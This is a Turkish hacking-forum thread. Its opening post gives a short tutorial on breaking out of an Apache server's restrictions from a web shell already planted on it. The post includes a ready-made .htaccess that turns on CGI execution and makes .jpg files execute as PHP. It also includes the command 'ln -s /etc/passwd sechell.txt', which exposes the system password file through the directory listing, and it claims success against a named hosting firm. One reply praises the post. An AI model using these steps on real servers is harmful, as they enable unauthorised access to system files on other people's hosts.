Joined
Sep 6, 2017
Credits
0
Rating - 0%
Apache server Bypass
View hidden content is available for registered users!

Kaynak = http://www.securityhell.info/2017/10/01/apache-server-bypass/

Merhaba, Apache server nasıl bypass edilir onu göstereceğim (servera gore değişir);

Shellimize girip yeni bir dizin oluşturuyoruz,



apache1-1.png


Dizine geçtikten sonra .htaccess adında dosya oluşturuyoruz ve asagıdaki kodları yapıstırıyoruz.

Options +FollowSymLinks +Indexes
DirectoryIndex default.html
## START ##
Options +ExecCGI
AddHandler cgi-script log cgi pl tg love h4 tgb x-zone
AddType application/x-httpd-php .jpg
RewriteEngine on
RewriteRule (.*)\war$ .log
## END ##

ReadmeName sechell.txt

Bunu da yaptıktan sonra su komutu veriyoruz;

ln -s /etc/passwd sechell.txt

Ve oluşturduğumuz dizine yeniden giriyoruz;



apache1-2.png


Ve ekrana yansıdı, işlemimiz bu kadar fakat her sunucu bunu yemez.

Dipnot : Netiyi gibi firmalarda denedim ise yaradı.
 
Joined
Jan 23, 2017
Credits
0
Rating - 0%
Eline sağlık kardeşim yararlı bilgi fakat biliniyor, bilmeyenler için gayet güzel anlatım olmuş
 

Users who are viewing this thread

Top